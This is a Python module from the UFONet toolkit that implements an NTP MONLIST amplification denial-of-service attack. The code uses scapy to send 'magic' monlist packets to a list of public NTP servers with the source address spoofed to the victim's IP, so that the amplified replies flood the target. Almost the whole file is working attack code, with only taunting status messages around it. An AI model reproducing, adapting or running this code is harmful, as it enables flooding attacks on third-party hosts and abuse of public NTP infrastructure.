12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273 |
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-"
- """
- This file is part of the UFONet project, https://ufonet.03c8.net
- Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
- You should have received a copy of the GNU General Public License along
- with UFONet; if not, write to the Free Software Foundation, Inc., 51
- Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
- """
- import sys, random
- try:
- from scapy import *
- except:
- print("\nError importing: scapy lib.\n")
- sys.exit(2)
- ntp_file = "botnet/ntp.txt" # NTP servers IP list
- #data = "\x17\x00\x03\x2a" + "\x00" * 4 # NTP v2 Monlist 'magic' packet!
- data = "\x1b\x00\x00\x00"+"\x00"*11*4 # NTP v3 Monlist 'magic' packet!
- # UFONet NTP Amplification (MONLIST) / [Port: 123]
- def monlistize(ip, rounds):
- n=0
- try: # (NTP) Amplification attack uses publically accessible NTP servers to flood a target with NTP response traffic
- with open(ntp_file) as f: # extract NTP servers from file
- ntp_d = f.read().splitlines()
- f.close()
- p_num=0
- for x in range (0,int(rounds)):
- try:
- n=n+1
- print("[Info] [AI] [MONLIST] Breaking NTP 'parsec' ["+str(n)+"] and remaking space-time on it! -> [SLOWING!]")
- for j in ntp_d:
- p_num += 1
- packet = IP(dst=j,src=ip)/UDP(sport=random.randint(2000,65535),dport=123)/Raw(load=data)
- try:
- send(packet, verbose=0) # not using sr1 because non-replies are required
- print(("[Info] [AI] [MONLIST] Broken NTP 'parsec' [{}]".format(p_num))+" IS INTERACTING WITH ["+str(j)+"] -> [AMPLIFYING!]")
- except:
- print(("[Info] [AI] [MONLIST] Broken NTP 'parsec' [{}]".format(p_num))+" HAS FAILED to interact with ["+str(j)+"] -> [PASSING!]")
- except:
- print("[Error] [AI] [MONLIST] Failed breaking NTP 'parsec' ["+str(n)+"]")
- except:
- print("[Error] [AI] [MONLIST] Failing to engage... -> Is still target online? -> [Checking!]")
- class MONLIST(object):
- def attacking(self, target, rounds):
- print("[Info] [AI] NTP Amplification (MONLIST) is ready to broke: [" , rounds, "parsecs ]")
- if target.startswith('http://'):
- target = target.replace('http://','')
- elif target.startswith('https://'):
- target = target.replace('https://','')
- try:
- ip = socket.gethostbyname(target)
- except:
- try:
- import dns.resolver
- r = dns.resolver.Resolver()
- r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
- url = urlparse(target)
- a = r.query(url.netloc, "A") # A record
- for rd in a:
- ip = str(rd)
- except:
- ip = target
- if ip == "127.0.0.1" or ip == "localhost":
- print("[Info] [AI] [MONLIST] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n")
- return
- monlistize(ip, rounds) # attack with MONLIST using threading
|